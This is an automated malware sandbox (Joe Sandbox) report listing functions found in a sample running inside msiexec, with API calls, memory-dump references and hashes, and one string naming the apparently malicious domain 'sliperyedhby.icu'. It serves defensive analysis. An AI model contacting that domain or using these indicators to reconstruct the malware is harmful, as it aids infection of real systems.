                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Uninitialize
                                                                                                                                                                                                                                • String ID: &/.1$HI$T%&/$^gFi$sliperyedhby.icu
                                                                                                                                                                                                                                • API String ID: 3861434553-1973299169
                                                                                                                                                                                                                                • Opcode ID: fff01b4f7100cc2016a34ce9e7c1a4c647d5b2168f1041d5e16d5db120956f80
                                                                                                                                                                                                                                • Instruction ID: 5c6351170b3d6f5c6e10ba329916351de42ca999fd1bd2cb9986fdeb7986be57
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fff01b4f7100cc2016a34ce9e7c1a4c647d5b2168f1041d5e16d5db120956f80
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1FA1FF7454D3D18AD7368F2684A07EBBBE2AFD7304F1849ADD4D90B246C739450ACB93
                                                                                                                                                                                                                                Function 0618F89D Relevance: 4.5, APIs: 3, Instructions: 15COMMONLIBRARYCODE
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(?,?,0618F897,00000016,0618CACD,?,?,E8B440B6,0618CACD,?), ref: 0618F8AE
                                                                                                                                                                                                                                • TerminateProcess.KERNEL32(00000000,?,0618F897,00000016,0618CACD,?,?,E8B440B6,0618CACD,?), ref: 0618F8B5
                                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 0618F8C7
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1703294689-0
                                                                                                                                                                                                                                • Opcode ID: 1f75c8efd180362d4382a0adbeda11f6f85191fab887609722a8d231cf02ec0b
                                                                                                                                                                                                                                • Instruction ID: 491426042e238b4680534f53b515e8df125ae60b1469aed30cbd081d8194dd77
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1f75c8efd180362d4382a0adbeda11f6f85191fab887609722a8d231cf02ec0b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 43D09E31000548BFDF813F62DE0D95D3F26AF452C1F544020BE25D5020DB3599A2EF90
                                                                                                                                                                                                                                Function 061939A5 Relevance: 3.2, APIs: 2, Instructions: 196fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 061930BB: GetConsoleOutputCP.KERNEL32(E8B440B6,00000000,00000000,00000000), ref: 0619311E
                                                                                                                                                                                                                                • WriteFile.KERNELBASE(?,00000000,?,00000000,00000000,00000000,00000000,0000000C,?,00000000,061AA588,00000014,0618D50D,00000000,00000000,00000000), ref: 06193B2A
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00000000), ref: 06193B34
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ConsoleErrorFileLastOutputWrite
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2915228174-0
                                                                                                                                                                                                                                • Opcode ID: c860fb97723f6c73cf87f67f7c2e93752df2b67005bdbe04cc3dec4407bf822b
                                                                                                                                                                                                                                • Instruction ID: b64b60c77f6004163109c340c32153408681527571fcb314d40a9ed9b06d44d0
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c860fb97723f6c73cf87f67f7c2e93752df2b67005bdbe04cc3dec4407bf822b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F461C171D00119AFDF95CFA8C884EEEBBBAAF49304F154149E921E7251D732DA05CBB1
                                                                                                                                                                                                                                Function 06192E60 Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetStdHandle.KERNEL32(000000F6), ref: 06192EAC
                                                                                                                                                                                                                                • GetFileType.KERNELBASE(00000000), ref: 06192EBE
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FileHandleType
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3000768030-0
                                                                                                                                                                                                                                • Opcode ID: eac2a999c0a5120422bb58809e2b11d5692b6ebd71c8c1de96eb165d3d33a809
                                                                                                                                                                                                                                • Instruction ID: 4cd690c831403aa18a9f9376891c6ec8411a9f1418d764fe2d73c85da18a5a90
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: eac2a999c0a5120422bb58809e2b11d5692b6ebd71c8c1de96eb165d3d33a809
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D71129719247416BCF748E3F8CC9222BA95AB52234B290B0AD5B7C26F1C334D785C271
                                                                                                                                                                                                                                Function 00319FBB Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetForegroundWindow.USER32 ref: 00319FBB
                                                                                                                                                                                                                                • GetForegroundWindow.USER32 ref: 00319FCC
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ForegroundWindow
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2020703349-0
                                                                                                                                                                                                                                • Opcode ID: e3e970f894be9392550e6e9f6508d9e38a0ee78b44a89bfdddf96759d816ff1d
                                                                                                                                                                                                                                • Instruction ID: f9b9a631c755352ef741d19aee58e896cd0baf7fb441a2ad5c99fd3275a4d8ab
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e3e970f894be9392550e6e9f6508d9e38a0ee78b44a89bfdddf96759d816ff1d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D3E0EB76A801008FD31E6324FC074A0331BDECA338F085039E80247316EF38A80286C3
                                                                                                                                                                                                                                Function 061966AC Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: __wsopen_s
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3347428461-0
                                                                                                                                                                                                                                • Opcode ID: bf9eb7dd4836b94888af4a1a4a354b2019717e25dba7e138d0306f29f90c0a32
                                                                                                                                                                                                                                • Instruction ID: 136e169f13b19f72276297ea1566c2de7f8a5a1bdef25f8c80c4846d1dd51649
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bf9eb7dd4836b94888af4a1a4a354b2019717e25dba7e138d0306f29f90c0a32
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CD111571A0420AAFCF09DF58E941A9B7BF5EF48304F054069F809EB251D730EA11CBA5
                                                                                                                                                                                                                                Function 0030C2D9 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: BlanketProxy
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3890896728-0
                                                                                                                                                                                                                                • Opcode ID: d72f622e202f833fce99f7b6f687225467be9aa39ba6ae2412b175da38ae15ab
                                                                                                                                                                                                                                • Instruction ID: 8b342f09103e9fe86cf777a9827e35736cb06a9da9de01846b25dbb78b173bfd
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d72f622e202f833fce99f7b6f687225467be9aa39ba6ae2412b175da38ae15ab
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 26F0B7741093418FE325DF25D5A8B5FBBF1BB84304F11891CE498CB390C7B596488F82
                                                                                                                                                                                                                                Function 0030B7B2 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: BlanketProxy
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3890896728-0
                                                                                                                                                                                                                                • Opcode ID: 2c36f83824a8320fa8a957ea9efb4967f310f50fec5d70bd4a4536aa312afb86
                                                                                                                                                                                                                                • Instruction ID: b9ad64127d8e27745a291c8ba2ef357941b9ec3e7b7c0e192643bd2cc36a03d2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2c36f83824a8320fa8a957ea9efb4967f310f50fec5d70bd4a4536aa312afb86
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2FF074B45097018FD315DF68D5A875ABBF4FB88304F11891DE4958B290D7B5AA48CF82
                                                                                                                                                                                                                                Function 002ED063 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 002ED075
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeSecurity
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 640775948-0
                                                                                                                                                                                                                                • Opcode ID: 934467ba49c6aaf04028661417c52a77c483518e439745208c634ecd8d08b250
                                                                                                                                                                                                                                • Instruction ID: d7e55c9e328dbacb12a8a844744f69b0bd22291ce29bc325b6da492a8a772193
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 934467ba49c6aaf04028661417c52a77c483518e439745208c634ecd8d08b250
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 12E01736BC4300BBF66A4A18EC43F4022165385B21F388618B320EE2D8CAF864028208
                                                                                                                                                                                                                                Function 002ED030 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CoInitializeEx.COMBASE(00000000,00000002), ref: 002ED043
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Initialize
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2538663250-0
                                                                                                                                                                                                                                • Opcode ID: 74eb73a36df54a61872c1067a95a257890f1082f5b8e9c9ef248387d993f7ffe
                                                                                                                                                                                                                                • Instruction ID: 24c0cdce0ab0f4161feb611ec57074302c24d3683740cd3ea3d6940e6fdee2bc
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 74eb73a36df54a61872c1067a95a257890f1082f5b8e9c9ef248387d993f7ffe
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FDD0A731564244BFD254AB2CEC0BF673A1C830B754F900728F7A3CA6D2D9116911C5A5
                                                                                                                                                                                                                                Function 0619C997 Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CreateFileW.KERNELBASE(00000000,00000000,?,0619CCF9,?,?,00000000,?,0619CCF9,00000000,0000000C), ref: 0619C9B4
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                                                                                                • Opcode ID: 5c94b8a8ae511d836ddfc51298e6051b2e21376210233dee58c89cb26a9f647e
                                                                                                                                                                                                                                • Instruction ID: 77b5b7d2dcca7d412da82c4172a3b2fd1f2c6afacfeb3ddc2edaecc0496ee634
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5c94b8a8ae511d836ddfc51298e6051b2e21376210233dee58c89cb26a9f647e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 30D06C3200024DFBDF128E84DD06EDA3BAAFB48754F018000BE1896020C736E872AB90
                                                                                                                                                                                                                                Function 0031646E Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(?,00000000,?,?,00000000), ref: 00316478
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FreeHeap
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3298025750-0
                                                                                                                                                                                                                                • Opcode ID: 190b1c37261d77c5a87e49d28f73ed1c13104b3fa7df8b50abf1d411d2f0ca15
                                                                                                                                                                                                                                • Instruction ID: 53e0523fe1e8e4849b2ddbb20f7c4fe8429b14caff032f5251ee609d2a8f5c70
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 190b1c37261d77c5a87e49d28f73ed1c13104b3fa7df8b50abf1d411d2f0ca15
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8BB00230145655B9E17217115CD9F7F1D7CDF43F95F104459B314140E046645502D57D
                                                                                                                                                                                                                                Function 003163D2 Relevance: 1.5, APIs: 1, Instructions: 6memoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(?,00000000), ref: 003163D8
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                                                • Opcode ID: b8471bf78ce379a1c3583dcc7d7f1a0fab8edd3bfd389bdd4d6d8f0232fc1265
                                                                                                                                                                                                                                • Instruction ID: 080d201b4512b5ed6868ae767db1ab5ecd00598542fe10e87550065817ab0fdd
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b8471bf78ce379a1c3583dcc7d7f1a0fab8edd3bfd389bdd4d6d8f0232fc1265
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FEB012300000005BDD051B00AC05B103518AB00706FA40050A404480A1C1524826D558

                                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                                Function 003128BC Relevance: 97.8, Strings: 78, Instructions: 339COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: !$!$#$#$%$'$'$)$)$+$,$-$-$/$0$1$3$3$4$5$7$9$9$;$=$?$?$A$B$B$B$C$C$E$E$E$G$M$M$Q$Q$Q$S$S$T$U$U$W$W$W$Y$Y$Y$Z$Z$[$[$]$]$]$]$_$_$`$`$a$h$k$l$l$o$p$p$u$y${$}$~
                                                                                                                                                                                                                                • API String ID: 0-2161944005
                                                                                                                                                                                                                                • Opcode ID: c700aac7b6c0bf8d988af2d8bc582691a89167fec8ce5a6b5ee9c49b079b15e0
                                                                                                                                                                                                                                • Instruction ID: 1df760b9289ecf0b854c9ee2892ae5fdc5fe90ef4c8bb040861c9df61640a085
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c700aac7b6c0bf8d988af2d8bc582691a89167fec8ce5a6b5ee9c49b079b15e0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9412FC2090C7D9CDDB22C67C9C487CEBFA15B27314F1842D9D1E86B2D2C7B54A89CB66
                                                                                                                                                                                                                                Function 002FFF40 Relevance: 28.3, Strings: 22, Instructions: 757COMMON
